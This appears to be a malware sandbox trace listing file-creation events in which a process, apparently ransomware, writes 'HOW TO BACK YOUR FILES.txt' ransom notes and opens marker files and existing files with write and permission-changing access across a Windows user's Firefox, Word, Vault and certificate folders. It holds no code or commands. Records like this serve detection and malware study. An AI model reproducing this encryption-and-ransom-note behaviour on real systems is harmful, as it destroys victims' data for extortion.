Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\BiosBlocks.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
